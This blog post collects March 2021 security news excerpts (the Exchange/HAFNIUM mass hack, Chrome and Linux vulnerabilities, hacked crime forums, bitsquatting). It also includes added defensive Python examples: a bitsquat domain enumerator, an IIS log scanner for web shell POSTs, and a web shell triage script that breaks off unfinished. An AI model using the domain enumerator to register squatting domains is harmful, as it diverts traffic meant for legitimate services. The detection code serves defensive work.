Cyber security news March 2021

This posting is here to collect cyber security news in March 2021.

I post links to security vulnerability news to comments of this article.

You are also free to post related links to comments.

342 Comments

  1. Tomi Engdahl says:

    High severity Linux network security holes found, fixed
    https://www.zdnet.com/article/linux-network-security-holes-found-fixed/
    This nasty set of bugs can lead to an attacker gaining root access, but the patch is already available.
    Young and rising Linux security developer Alexander Popov of Russia’s Positive Technologies discovered and fixed a set of five security holes in the Linux kernel’s virtual socket implementation. An attacker could use these vulnerabilities (CVE-2021-26708) to gain root access and knock out servers in a Denial of Service (DoS) attack.
    With a Common Vulnerability Scoring System (CVSS) v3 base score of 7.0, high severity, smart Linux administrators will patch their systems as soon as possible.
    While Popov discovered the bugs in Red Hat’s community Linux distribution Fedora 33 Server, it exists in systems using the Linux kernel from November 2019’s version 5.5 to the current mainline kernel version 5.11-rc6.
    These holes entered Linux when virtual socket multi-transport support was added. This networking transport facilitates communication between virtual machines (VM) and their host.
    The core problem is race conditions in the CONFIG_VSOCKETS and CONFIG_VIRTIO_VSOCKETS kernel drivers. These are shipped as kernel modules in all major Linux distributions. The reason why this is such a serious problem is whenever an ordinary user creates an AF_VSOCK socket, the vulnerable modules are automatically loaded. A race condition exists when a system’s substantive behavior depends on the sequence or timing of uncontrollable events.
    Greg Kroah-Hartman, the stable Linux kernel chief maintainer, accepted the patches into Linux 5.10.13 on February 3. Since then the patch has been merged into mainline kernel version 5.11-rc7 and backported into affected stable trees.

    The patch has also already been incorporated into such popular Linux distributions as Red Hat Enterprise Linux (RHEL) 8, Debian, Ubuntu, and SUSE.

    Reply
  2. Tomi Engdahl says:

    Chrome 89 Patches Actively Exploited Vulnerability
    https://www.securityweek.com/chrome-89-patches-actively-exploited-vulnerability

    Google this week announced the availability of Chrome 89 in the stable channel, with patches for a total of 47 vulnerabilities, including one that has been exploited in the wild.

    Tracked as CVE-2021-21166, the zero-day security hole is described as a high-severity “object lifecycle issue in audio.” The bug was reported by Alison Huffman of Microsoft Browser Vulnerability Research, and is the second of this type addressed in Chrome 89, alongside CVE-2021-21165, also rated high risk.

    “Google is aware of reports that an exploit for CVE-2021-21166 exists in the wild,” the Internet giant notes, without providing further details on exploitation, impact, or attack vectors.

    Reply
  3. Tomi Engdahl says:

    High severity Linux network security holes found, fixed
    https://www.zdnet.com/article/linux-network-security-holes-found-fixed/

    This nasty set of bugs can lead to an attacker gaining root access, but the patch is already available.

    Reply
  4. Tomi Engdahl says:

    It only took four years and thousands of complaints but ICANN finally kills off rogue Indian domain registrar
    DNS oversight body accused again and again of chronic foot-dragging
    https://www.theregister.com/AMP/2021/03/04/icann_domain_woes/?__twitter_impression=true

    Reply
  5. Tomi Engdahl says:

    “KEY ALERT” — German prison has to spend ‘£43,000’ changing 600 locks after intern sent a photo of the keys to his friends on WhatsApp
    https://www.dailymail.co.uk/news/article-9325001/German-prison-changes-locks-intern-shared-photos.html

    The trainee shared the photos on a WhatsApp group to boast about his new job
    It raised fears that the prison’s 647 inmates could have staged a mass breakout
    The prison near Berlin has since changed all the locks in cells and corridors

    The trainee at Heidering prison near Berlin took photos of the keys and shared them in a WhatsApp group to brag about his new job, German media says.

    But he apparently failed to realise that keys can easily be reproduced by specialists, meaning replicas could have been smuggled inside.

    The intern is said to have shared pictures of cell and corridor keys before the leak was reported to judicial authorities on Thursday.

    Around 20 prison workers were tasked with changing the locks the following day and had to work through the night to head off the security risk.

    Officials said the old keys were quickly destroyed after they had been used one last time to open the doors so that the locks could be changed.

    Reply
  6. Tomi Engdahl says:

    Three Top Russian Cybercrime Forums Hacked
    https://krebsonsecurity.com/2021/03/three-top-russian-cybercrime-forums-hacked/
    Over the past few weeks, three of the longest running and most venerated Russian-language online forums serving thousands of experienced cybercriminals have been hacked. In two of the intrusions, the attackers made off with the forums’ user databases, including email and Internet addresses and hashed passwords. Members of all three forums are worried the incidents could serve as a virtual Rosetta Stone for connecting the real-life identities of the same users across multiple crime forums. On Tuesday, someone dumped thousands of usernames, email addresses and obfuscated passwords on the dark web apparently pilfered from Mazafaka (a.k.a. Maza, MFclub), an exclusive crime forum that has for more than a decade played host to some of the most experienced and infamous Russian cyberthieves. The compromise of Maza and Verified and possibly a third major forum has many community members concerned that their real-life identities could be exposed. Exploit, perhaps the next-largest and most popular Russian forum after Verified, also experienced an apparent compromise this week.

    Reply
  7. Tomi Engdahl says:

    Unsecured Cloud Configurations Exposing Information in Thousands of
    Mobile Apps
    https://blog.zimperium.com/unsecured-cloud-configurations-exposing-information-in-thousands-of-mobile-apps/
    In our analysis, 14% of iOS and Android apps that use cloud storage had unsecure configurations and were vulnerable to a number of significant issues that exposed PII, enabled fraud or exposed IP or internal systems. During our review, we encountered several apps relying on both Google and Amazon storage that was accessible without any security. In one example, the information we were able to obtain included profile pictures and other PII information. Other apps leak information that enables fraud. In one example, an app shows images containing physical payment implements such as checks. Another category of apps exposes configuration information that could be used for further investigation or penetration. For example, one may think music apps don’t have any important information to protect; however, we identified cases where the entire server infrastructures, scripts, servers and much more was exposed publicly.

    Reply
  8. Tomi Engdahl says:

    Windows DNS SIGRed bug gets first public RCE PoC exploit
    https://www.bleepingcomputer.com/news/security/windows-dns-sigred-bug-gets-first-public-rce-poc-exploit/
    “If exploited carefully, attackers can execute code remotely on the vulnerable system and gain Domain Admin rights, effectively compromising the entire corporate infrastructure,” Palmiotti explained. Details at
    https://www.graplsecurity.com/post/anatomy-of-an-exploit-rce-with-cve-2020-1350-sigred

    Reply
  9. Tomi Engdahl says:

    SITA statement about security incident
    https://www.sita.aero/pressroom/news-releases/sita-statement-about-security-incident/
    SITA confirms that it was the victim of a cyber-attack, leading to a data security incident involving certain passenger data that was stored on SITA Passenger Service System (US) Inc. servers. Passenger Service System (US) Inc. (SITA PSS) operates passenger processing systems for airlines. Finnair is also among the victims:
    https://www.hs.fi/talous/art-2000007839783.html

    Reply
  10. Tomi Engdahl says:

    Researcher bitsquats Microsoft’s windows.com to steal traffic
    https://www.bleepingcomputer.com/news/security/researcher-bitsquats-microsofts-windowscom-to-steal-traffic/
    A researcher was able to “bitsquat” Microsoft’s windows.com domain by cybersquatting variations of windows.com. However, this technique differs from cases where typosquatting domains are used for phishing activities in that it requires no action on the victim’s part. …
    “Now let’s say that the computer is running too hot, a solar flare is happening, or a cosmic ray (very real thing) flips a bit on the computer,” says [the researcher] Remy. In a 2011 Black Hat paper, titled “Bit-squatting: DNS Hijacking without Exploitation,” researcher Artem Dinaburg found that when he had squatted 31 bitsquatted variations of eight legitimate domains of multiple organizations, on average 3,434 daily DNS requests came his way that should otherwise have gone to the DNS servers for the legitimate domains. Likewise, as soon as Remy squatted the aforementioned domains and set up sinkholes to record any traffic, the researcher noticed an uptick in legitimate traffic coming his way. Blog at
    https://remyhax.xyz/posts/bitsquatting-windows/

    Reply
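The bit-flip mechanism described in the comment above, as an added example that is neither the researcher’s code nor from the article: it enumerates the single-bit neighbours of a domain that are still valid hostnames (the ones a domain owner would register defensively or watch for in resolver logs) and, going the other way, tests whether an observed name is a one-bit neighbour of a domain the owner controls. `windows.com` is used only because the article names it; the functions and their names are this example’s own.

```python
"""Enumerate the single-bit-flip ("bitsquat") neighbours of a domain name.

Added example, not code from the article or from the researcher's blog.
A domain owner can use the list to decide which neighbours to register or
to alert on in DNS logs; is_bitsquat_of() is the matching check in the
other direction. Only variants that are still valid hostnames are kept,
because a flipped byte that yields an invalid name never turns into a
resolvable query.
"""
import string
from typing import List, Optional

# Letters, digits and hyphen are the only characters allowed in a label.
# Hostnames are case-insensitive, so lowercase is treated as canonical and
# a flip that merely changes case (bit 5 of a letter) is not a new name.
VALID_LABEL_CHARS = frozenset(string.ascii_lowercase + string.digits + "-")


def label_is_valid(label: str) -> bool:
    """1-63 chars, letters/digits/hyphen only, no leading or trailing hyphen."""
    return (0 < len(label) <= 63
            and all(c in VALID_LABEL_CHARS for c in label)
            and not label.startswith("-")
            and not label.endswith("-"))


def bitsquat_variants(domain: str, flip_tld: bool = False) -> List[str]:
    """All distinct hostnames reachable from `domain` by flipping one bit
    of one character.  The TLD label is skipped unless flip_tld is set,
    since a flipped TLD usually lands in a zone nobody can register.
    """
    labels = domain.lower().split(".")
    editable = len(labels) if flip_tld else len(labels) - 1
    found = set()
    for li in range(editable):
        label = labels[li]
        for ci, ch in enumerate(label):
            for bit in range(8):
                flipped = chr(ord(ch) ^ (1 << bit))
                new_label = label[:ci] + flipped + label[ci + 1:]
                # Rejects uppercase, control bytes, '.', and non-ASCII results.
                if not label_is_valid(new_label):
                    continue
                found.add(".".join(labels[:li] + [new_label] + labels[li + 1:]))
    return sorted(found)


def hamming_bits(a: str, b: str) -> Optional[int]:
    """Number of differing bits between two equal-length strings, else None."""
    if len(a) != len(b):
        return None
    return sum(bin(ord(x) ^ ord(y)).count("1") for x, y in zip(a, b))


def is_bitsquat_of(candidate: str, domain: str) -> bool:
    """True if `candidate` differs from `domain` in exactly one bit.  This is
    what separates a bitsquat from an ordinary typosquat: 'o' -> '0', for
    instance, differs in five bits and is not something a cosmic ray does."""
    return hamming_bits(candidate.lower(), domain.lower()) == 1


if __name__ == "__main__":
    # Print the registrable one-bit neighbours of the domain from the article.
    for name in bitsquat_variants("windows.com"):
        print(name)
```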
  11. Tomi Engdahl says:

    Microsoft: We’re cracking down on Excel macro malware
    https://www.zdnet.com/article/microsoft-were-cracking-down-on-malware-that-uses-excel-macros/
    Now Microsoft is expanding the integration of its AMSI with Office 365
    to include the scanning of Excel 4.0 XLM macros at runtime, bringing
    AMSI in line with VBA.

    Reply
  12. Tomi Engdahl says:

    High severity Linux network security holes found, fixed
    This nasty set of bugs can lead to an attacker gaining root access, but the patch is already available.
    https://www.zdnet.com/article/linux-network-security-holes-found-fixed/

    Reply
  13. Tomi Engdahl says:

    Microsoft: We’ve found three more pieces of malware used by the SolarWinds attackers
    Microsoft and FireEye have identified a new “elegant” backdoor used by the SolarWinds attackers.
    https://www.zdnet.com/article/microsoft-weve-found-three-more-pieces-of-malware-used-by-the-solarwinds-attackers/?ftag=COS-05-10aaa0h&utm_campaign=trueAnthem%3A+Trending+Content&utm_medium=trueAnthem&utm_source=facebook

    Reply
  14. Tomi Engdahl says:

    Thousands of Microsoft Customers May Have Been Victims of Hack Tied to China
    https://www.nytimes.com/2021/03/06/technology/microsoft-hack-china.html

    The hackers started their attack in January but escalated their efforts in recent weeks, security experts say. Business and government agencies affected.

    Businesses and government agencies in the United States that use a Microsoft email service have been compromised in an aggressive hacking campaign that was probably sponsored by the Chinese government, Microsoft said.

    The number of victims is estimated to be in the tens of thousands and could rise, some security experts believe, as the investigation into the breach continues. The hackers had stealthily attacked several targets in January

    Reply
  15. Tomi Engdahl says:

    Brian Krebs / Krebs on Security:
    Sources: at least 30K US organizations have been hacked by an aggressive Chinese espionage group exploiting unpatched flaws in Microsoft’s Exchange Server — At least 30,000 organizations across the United States — including a significant number of small businesses, towns …

    At Least 30,000 U.S. Organizations Newly Hacked Via Holes in Microsoft’s Email Software
    https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/

    At least 30,000 organizations across the United States — including a significant number of small businesses, towns, cities and local governments — have over the past few days been hacked by an unusually aggressive Chinese cyber espionage unit that’s focused on stealing email from victim organizations, multiple sources tell KrebsOnSecurity. The espionage group is exploiting four newly-discovered flaws in Microsoft Exchange Server email software, and has seeded hundreds of thousands of victim organizations worldwide with tools that give the attackers total, remote control over affected systems.

    On March 2, Microsoft released emergency security updates to plug four security holes in Exchange Server versions 2013 through 2019 that hackers were actively using to siphon email communications from Internet-facing systems running Exchange.

    In the three days since then, security experts say the same Chinese cyber espionage group has dramatically stepped up attacks on any vulnerable, unpatched Exchange servers worldwide.

    In each incident, the intruders have left behind a “web shell,” an easy-to-use, password-protected hacking tool that can be accessed over the Internet from any browser. The web shell gives the attackers administrative access to the victim’s computer servers.

    Speaking on condition of anonymity, two cybersecurity experts who’ve briefed U.S. national security advisors on the attack told KrebsOnSecurity the Chinese hacking group thought to be responsible has seized control over “hundreds of thousands” of Microsoft Exchange Servers worldwide — with each victim system representing approximately one organization that uses Exchange to process email.

    Microsoft said the Exchange flaws are being targeted by a previously unidentified Chinese hacking crew it dubbed “Hafnium,” and said the group had been conducting targeted attacks on email systems used by a range of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.

    Reply
  16. Tomi Engdahl says:

    White House fears significant number of organisations caught in Microsoft hack
    https://www.abc.net.au/news/2021-03-06/white-house-fears-significant-hack-microsoft-exchange-email/13223508

    The White House fears a significant number of organisations around the world have been compromised through a back door installed via recently patched flaws in Microsoft’s email software, and warns it “could have far-reaching impacts”.

    Key points:
    Microsoft has declined to provide details on the scale of the hack
    All of those affected are thought to have used web versions of the Outlook email client
    White House press secretary Jen Psaki says there are concerns “there are a large number of victims”

    The hacking has already reached more places than all of the tainted code downloaded from SolarWinds Corp, the company at the heart of another massive hacking spree uncovered in December.

    The latest hack has left channels for remote access spread among credit unions, town governments and small businesses, according to records from a US investigation

    If successfully exploited, “an unauthenticated attacker” could “write files and execute code”, the alert warned.

    Tens of thousands of organisations in Asia and Europe are also affected, the records show.

    The hacks are continuing despite emergency patches issued by Microsoft on Tuesday.

    Microsoft, which had initially said the hacks consisted of “limited and targeted attacks,” declined to comment on the scale of the problem on Friday but said it was working with government agencies and security companies to provide help to customers.

    One scan of connected devices showed only 10 per cent of those vulnerable had installed the patches by Friday, though the number was rising.

    Because installing the patch does not get rid of the back doors, US officials are racing to figure out how to notify all the victims and guide them in their hunt.

    Reply
  17. Tomi Engdahl says:

    At Least 30,000 US Organizations Newly Hacked Via Holes In Microsoft’s Email Software
    https://m.slashdot.org/story/382604

    Reply
  18. Tomi Engdahl says:

    A communications and IT vendor for 90 percent of the world’s #airlines, SITA, has been hit with a security #breach.
    https://threatpost.com/supply-chain-cyberattack-airlines/164549/

    Reply
  19. Tomi Engdahl says:

    Move over, SolarWinds: 30,000 orgs’ email hacked via Microsoft Exchange Server flaws
    The attack has been ongoing since January
    https://www.theverge.com/2021/3/5/22316189/microsoft-exchange-server-security-exploit-china-attack-30000-organizations

    Reply
  20. Tomi Engdahl says:

    The Former SolarWinds CEO Is Blaming the Firm’s Poor Cybersecurity on an Intern
    https://slate.com/technology/2021/03/solarwinds-hack-cyber-espionage-intern-password.html

    Reply
  21. Tomi Engdahl says:

    Mazafaka Elite Hacking and Cybercrime Forum Got Hacked!
    https://thehackernews.com/2021/03/mazafaka-elite-hacking-and-cybercrime.html
    In what’s a case of hackers getting hacked, a prominent underground online criminal forum by the name of Maza has been compromised by unknown attackers, making it the fourth forum to have been breached since the start of the year. The intrusion is said to have occurred on March 3, with information about the forum members including usernames, email addresses, and hashed passwords publicly disclosed on a breach notification page put up by the attackers, stating “Your data has been leaked” and “This forum has been hacked.” Also:
    https://www.bleepingcomputer.com/news/security/notorious-maza-cybercrime-forum-attacked-by-other-hackers/

    Reply
  22. Tomi Engdahl says:

    Detection and Response to Exploitation of Microsoft Exchange Zero-Day
    Vulnerabilities
    https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html
    Beginning in January 2021, Mandiant Managed Defense observed multiple
    instances of abuse of Microsoft Exchange Server within at least one
    client environment. The observed activity included creation of web
    shells for persistent access, remote code execution, and
    reconnaissance for endpoint security solutions. Our investigation
    revealed that the files created on the Exchange servers were owned by
    the user NT AUTHORITY\SYSTEM, a privileged local account on the
    Windows operating system.

    Reply
  23. Tomi Engdahl says:

    PLEASE LEAVE AN EXPLOIT AFTER THE BEEP
    https://www.dubex.dk/aktuelt/nyheder/please-leave-an-exploit-after-the-beep
    In January 2021, Dubex investigated suspicious activity on a set of Exchange servers. Generic post exploitation activity was seen, and many POST requests were sent to webshells hosted in the OWA directory. It was initially suspected the servers might be backdoored directly through the OWA and that webshells were being used for ease of access. As a result, Dubex started its incident response efforts and acquired system memory (RAM) and disk images to initiate a forensics investigation. This investigation revealed a zero-day exploit being used in the wild.

    Reply
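The triage pattern the Mandiant and Dubex posts above describe (repeated POST requests to web shells dropped in the OWA directory) can be reproduced as a first pass over IIS logs. This is an added example, not code from Dubex, Mandiant or Microsoft: it parses W3C extended log lines by their `#Fields:` header and flags POSTs to `.aspx` resources under `/owa/` that are not on an allowlist. The log lines, the `sample.aspx` name and the allowlist (only `/owa/auth/logon.aspx`, the normal OWA form-login target) are constructed here and must be adjusted to the deployment being examined.

```python
"""Flag POST requests to unexpected .aspx pages under /owa/ in IIS W3C logs.

Added example, not from Dubex, Mandiant or Microsoft.  The sample log,
the allowlist and the file name sample.aspx are constructed for this
example; the allowlist in particular is an assumption to tune per site.
"""
from collections import Counter
from typing import Dict, List, Tuple

# Assumed allowlist: .aspx pages under /owa/ that legitimately receive POSTs.
KNOWN_POST_TARGETS = frozenset({"/owa/auth/logon.aspx"})

# Constructed sample in IIS W3C extended format (field list reduced for brevity).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2021-01-05 09:12:01 POST /owa/auth/logon.aspx url=%2fowa%2f 192.0.2.10 302
2021-01-05 09:12:07 GET /owa/ - 192.0.2.10 200
2021-01-05 09:14:33 POST /owa/auth/sample.aspx - 198.51.100.7 200
2021-01-05 09:14:35 POST /owa/auth/sample.aspx - 198.51.100.7 200
2021-01-05 09:14:40 POST /owa/auth/sample.aspx - 198.51.100.7 200
2021-01-05 09:15:02 GET /owa/auth/sample.aspx - 198.51.100.7 200
2021-01-05 09:20:11 POST /ecp/default.aspx - 192.0.2.11 200
"""


def parse_iis_log(text: str) -> List[Dict[str, str]]:
    """Parse W3C extended log text into dicts keyed by the #Fields names.

    The field list is taken from the most recent #Fields: directive, so logs
    whose field set changes mid-file are still read correctly.
    """
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue  # other directives (#Software, #Date, ...) and blanks
        parts = line.split()
        if not fields or len(parts) != len(fields):
            continue  # truncated or malformed line: skip rather than misalign
        records.append(dict(zip(fields, parts)))
    return records


def suspicious_owa_posts(records: List[Dict[str, str]],
                         allowlist=KNOWN_POST_TARGETS) -> Dict[Tuple[str, str], int]:
    """Count POSTs per (client IP, URI stem) for .aspx targets under /owa/
    that are not in the allowlist.  Web shells are driven almost entirely
    through POST bodies, so repeated POSTs to an unknown .aspx stand out.
    """
    hits: Counter = Counter()
    for rec in records:
        if rec.get("cs-method") != "POST":
            continue
        stem = rec.get("cs-uri-stem", "").lower()
        if not stem.startswith("/owa/") or not stem.endswith(".aspx"):
            continue
        if stem in allowlist:
            continue
        hits[(rec.get("c-ip", "?"), stem)] += 1
    return dict(hits)


def summarize(hits: Dict[Tuple[str, str], int]) -> List[str]:
    """Render findings, busiest source first, for an analyst to review."""
    ordered = sorted(hits.items(), key=lambda kv: (-kv[1], kv[0]))
    return [f"{count} POST(s) from {ip} to {stem}" for (ip, stem), count in ordered]


if __name__ == "__main__":
    for line in summarize(suspicious_owa_posts(parse_iis_log(SAMPLE_LOG))):
        print(line)
```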
  24. Tomi Engdahl says:

    Microsoft: Exchange updates can install without fixing vulnerabilities
    https://www.bleepingcomputer.com/news/security/microsoft-exchange-updates-can-install-without-fixing-vulnerabilities/
    Due to the critical nature of recently issued Microsoft Exchange
    security updates, admins need to know that the updates may have
    installation issues on servers where User Account Control (UAC) is
    enabled. Microsoft has added these warnings to all Exchange security
    updates released throughout the last few years.

    Reply
  25. Tomi Engdahl says:

    D-Link, IoT Devices Under Attack By Tor-Based Gafgyt Variant
    https://threatpost.com/d-link-iot-tor-gafgyt-variant/164529/
    A new variant of the Gafgyt botnet that’s actively targeting vulnerable D-Link and Internet of Things devices is the first variant of the malware to rely on Tor communications, researchers say. Gafgyt, a botnet that was uncovered in 2014, has become infamous for launching large-scale distributed denial-of-service (DDoS) attacks. Researchers first discovered activity from the newest variant, which they call Gafgyt_tor, on Feb. 15.

    Reply
  26. Tomi Engdahl says:

    These two unusual versions of ransomware tell us a lot about how
    attacks are evolving
    https://www.zdnet.com/article/these-two-unusual-versions-of-ransomware-tell-us-a-lot-about-how-attacks-are-evolving/
    Two newly discovered forms of ransomware with very different traits show just how diverse the world of ransomware has become as more cyber criminals attempt to join in with cyber extortion. Both forms of ransomware emerged in February and have been detailed by cybersecurity researchers at Trend Micro: AlumniLocker and Humble, with the two versions attempting to extort a bitcoin ransom in different ways.

    Reply
  27. Tomi Engdahl says:

    Beware of this kind of message: malware may send thousands of messages at your expense and compromise your bank account
    https://www.tivi.fi/uutiset/tv/e4a64a51-b6c1-4868-8ea2-e3f0964dbd54
    Criminals are once again harassing Finns with scam messages sent in the name of Posti or PostNord. The police say in their release that the scam message may arrive as a text message asking the recipient to install an app on the phone via a link in the message. If the recipient’s mobile phone runs Android, tapping the link installs malware that sends hundreds or thousands of messages abroad from the device, charged to the customer. The malware is hard to notice until the device starts sending large numbers of messages on its own, the police say.

    Reply
  28. Tomi Engdahl says:

    Microsoft Exchange Server Vulnerabilities Mitigations March 2021
    https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/
    Microsoft previously blogged our strong recommendation that customers upgrade their on-premises Exchange environments to the latest supported version. For customers that are not able to quickly apply updates, we are providing the following alternative mitigation techniques to help Microsoft Exchange customers who need more time to patch their deployments and are willing to make risk and service function trade-offs. These mitigations are not a remediation if your Exchange servers have already been compromised, nor are they full protection against attack.

    At Least 30,000 U.S. Organizations Newly Hacked Via Holes in Microsoft’s Email Software
    https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/
    At least 30,000 organizations across the United States, including a significant number of small businesses, towns, cities and local governments, have over the past few days been hacked by an unusually aggressive Chinese cyber espionage unit that’s focused on stealing email from victim organizations, multiple sources tell KrebsOnSecurity. The espionage group is exploiting four newly-discovered flaws in Microsoft Exchange Server email software, and has seeded hundreds of thousands of victim organizations worldwide with tools that give the attackers total, remote control over affected systems.

    Reply
  29. Tomi Engdahl says:

    Microsoft Adopted an ‘Aggressive’ Strategy for Sharing SolarWinds
    Attack Intel
    https://www.darkreading.com/operations/microsoft-adopted-an-aggressive-strategy-for-sharing-solarwinds-attack-intel/d/d-id/1340327
    Rob Lefferts, corporate vice president for Microsoft 365 Security in
    Security and Compliance, explains the company’s approach to keeping
    its customers and the industry apprised and updated on its findings
    from the now-infamous attack. In the wake of a widespread cyberattack,
    enterprise IT providers can play a key role in how businesses learn
    about and mitigate the security threat. That role has evolved as
    attacks grow more complex – and it presents a tricky challenge when a
    provider must keep businesses informed of an attack that has
    infiltrated its own walls and affected tens of thousands of its
    customers, as Microsoft experienced during the recent SolarWinds
    incident.

    Reply
  30. Tomi Engdahl says:

    China’s RedEcho accused of targeting India’s power grids
    https://blog.malwarebytes.com/vital-infrastructure/2021/03/chinas-redecho-accused-of-targeting-indias-power-grids/
    RedEcho, an advanced persistent threat (APT) group from China, has attempted to infiltrate the systems behind India’s power grids, according to a threat analysis report from Recorded Future [PDF]. It appears that what triggered this attempt to gain a foothold in India’s critical power generation and transmission infrastructure was a tense standoff at Pangong Tso lake in May 2020. However, the report by Recorded Future, a cybersecurity company specializing in threat intelligence, claims that RedEcho were on the prowl well before this time.

    Reply
  31. Tomi Engdahl says:

    Microsoft IOC Detection Tool for Exchange Server Vulnerabilities
    https://us-cert.cisa.gov/ncas/current-activity/2021/03/06/microsoft-ioc-detection-tool-exchange-server-vulnerabilities
    Microsoft has released an updated script that scans Exchange log files for indicators of compromise (IOCs) associated with the vulnerabilities disclosed on March 2, 2021. CISA is aware of widespread domestic and international exploitation of these vulnerabilities and strongly recommends organizations run the Test-ProxyLogon.ps1 script as soon as possible to help determine whether their systems are compromised. For additional information on the script, see Microsoft’s blog post “HAFNIUM targeting Exchange Servers with 0-day exploits.”

    Reply
  32. Tomi Engdahl says:

    Check to see if you’re vulnerable to Microsoft Exchange Server zero-days using this tool
    https://www.zdnet.com/article/check-to-see-if-youre-vulnerable-to-microsoft-exchange-server-zero-days-using-this-tool/
    Microsoft’s Exchange Server team has released a script for IT admins
    to check if systems are vulnerable to recently-disclosed zero-day
    bugs. As noted in an alert published by the US Cybersecurity and
    Infrastructure Security Agency (CISA) on Saturday, Microsoft’s team
    has published a script on GitHub that can check the security status of
    Exchange servers.

    Reply
  33. Tomi Engdahl says:

    Microsoft Office 365 gets protection against malicious XLM macros
    https://www.bleepingcomputer.com/news/security/microsoft-office-365-gets-protection-against-malicious-xlm-macros/
    Microsoft has added XLM macro protection for Microsoft 365 customers by expanding the runtime defense provided by Office 365’s integration with Antimalware Scan Interface (AMSI) to include Excel 4.0 (XLM) macro scanning. AMSI was introduced in 2015, and it has been adopted by all major antivirus products available for the Windows 10 platform since then. It allows Windows 10 services and apps to communicate with security products and request runtime scans of potentially dangerous data.

    Reply
  34. Tomi Engdahl says:

    The attack, which Microsoft has said started with a Chinese government-backed hacking group, has so far claimed at least 60,000 known victims globally, according a former senior US official with knowledge of the investigation. Many of them appear to be small or medium-sized businesses caught in a wide net the attackers cast as Microsoft worked to shut down the hack.

    Victims identified so far include banks and electricity providers, as well as senior citizen homes and an ice cream company,
    https://www.thestar.com.my/tech/tech-news/2021/03/07/hackers-breach-thousands-of-microsoft-customers-around-the-world

    Reply
  35. Tomi Engdahl says:

    A Basic Timeline of the Exchange Mass-Hack
    https://krebsonsecurity.com/2021/03/a-basic-timeline-of-the-exchange-mass-hack/
    Sometimes when a complex story takes us by surprise or knocks us back on our heels, it pays to revisit the events in a somewhat linear fashion. Here’s a brief timeline of what we know leading up to last week’s mass-hack, when hundreds of thousands of Microsoft Exchange Server systems got compromised and seeded with a powerful backdoor Trojan horse program. When did Microsoft find out about attacks on previously unknown vulnerabilities in Exchange?

    Reply
  36. Tomi Engdahl says:

    Kyberturvallisuuskeskus warns: hundreds of organisations are at risk of becoming, or have already become, targets of the email server breach
    https://yle.fi/uutiset/3-11827028
    Kyberturvallisuuskeskus (Finland’s National Cyber Security Centre) warns that hundreds of organisations in Finland are at risk of becoming, or have already become, targets of the email server breach. In scope and severity the problem is the largest in Finland in at least a couple of decades, estimates the centre’s senior specialist Juha Tretjakov. The problem concerns some of the parties that use Microsoft’s Exchange server. Kyberturvallisuuskeskus says on its website that on Monday it updated its red alert concerning the Exchange email server, stating that merely updating the server is not a sufficient measure. Also:
    https://www.is.fi/digitoday/tietoturva/art-2000007848088.html
    https://www.tivi.fi/uutiset/tv/d825bda3-5d0f-42c2-bc71-e3d666e673f5
    https://www.hs.fi/talous/art-2000007848036.html

    Reply
  37. Tomi Engdahl says:

    European Banking Authority discloses Exchange server hack
    https://www.bleepingcomputer.com/news/security/european-banking-authority-discloses-exchange-server-hack/
    The European Banking Authority (EBA) took down all email systems after their Microsoft Exchange Servers were hacked as part of the ongoing attacks targeting organizations worldwide. EBA is part of the European System of Financial Supervision and it oversees the integrity and orderly functioning of the EU banking sector. “The Agency has swiftly launched a full investigation, in close cooperation with its ICT provider, a team of forensic experts and other relevant entities,” EBA said.

    Reply
  38. Tomi Engdahl says:

    Hackers hiding Supernova malware in SolarWinds Orion linked to China
    https://www.bleepingcomputer.com/news/security/hackers-hiding-supernova-malware-in-solarwinds-orion-linked-to-china/
    Intrusion activity related to the Supernova malware planted on
    compromised SolarWinds Orion installations exposed on the public
    internet points to an espionage threat actor based in China. Security
    researchers named the hacker group Spiral and correlated findings from
    two intrusions in 2020 on the same victim network to determine
    activity from the same intruder.

    Reply
  39. Tomi Engdahl says:

    Microsoft Exchange Cyber Attack: What Do We Know So Far?
    https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html
    Microsoft on Friday warned of active attacks exploiting unpatched
    Exchange Servers carried out by multiple threat actors, as the hacking
    campaign is believed to have infected tens of thousands of businesses,
    government entities in the U.S., Asia, and Europe. The company said
    “it continues to see increased use of these vulnerabilities in attacks
    targeting unpatched systems by multiple malicious actors beyond
    HAFNIUM,” signaling an escalation that the breaches are no longer
    “limited and targeted” as was previously deemed.

    Reply
  40. Tomi Engdahl says:

    Microsoft’s MSERT tool now finds web shells from Exchange Server
    attacks
    https://www.bleepingcomputer.com/news/security/microsofts-msert-tool-now-finds-web-shells-from-exchange-server-attacks/
    Microsoft has pushed out a new update for their Microsoft Safety
    Scanner (MSERT) tool to detect web shells deployed in the recent
    Exchange Server attacks. On March 2nd, Microsoft disclosed that four
    Exchange Server zero-day vulnerabilities were being used in attacks
    against exposed Outlook on the web (OWA) servers. These
    vulnerabilities are tracked as CVE-2021-26855, CVE-2021-26857,
    CVE-2021-26858, CVE-2021-27065.

    Reply
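    A way to triage an Exchange front end for dropped web shells of the kind MSERT now detects, as an added example that is not part of the original post and not Microsoft's tool. The watched directory names and the content patterns are assumptions drawn from public write-ups of the March 2021 intrusions, and the sample files are constructed inline; on a real server the scan would walk the IIS and Exchange front-end directories instead of a fixed list.

```python
"""Web shell triage for an Exchange front end (added example).

Assumptions, not from the article: the directory list and content
patterns come from public HAFNIUM write-ups; the sample files below
are constructed for the example.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timezone

# Web-accessible directories reported to receive .aspx web shells in the
# March 2021 attacks (assumption; normalised to lower case and "/").
WATCHED_DIRS = (
    "inetpub/wwwroot/aspnet_client/",
    "program files/microsoft/exchange server/v15/frontend/httpproxy/owa/auth/",
    "program files/microsoft/exchange server/v15/frontend/httpproxy/ecp/auth/",
)

# No legitimate .aspx pages are expected under aspnet_client at all, so
# any .aspx there is a finding on its own.
NO_ASPX_EXPECTED = ("inetpub/wwwroot/aspnet_client/",)

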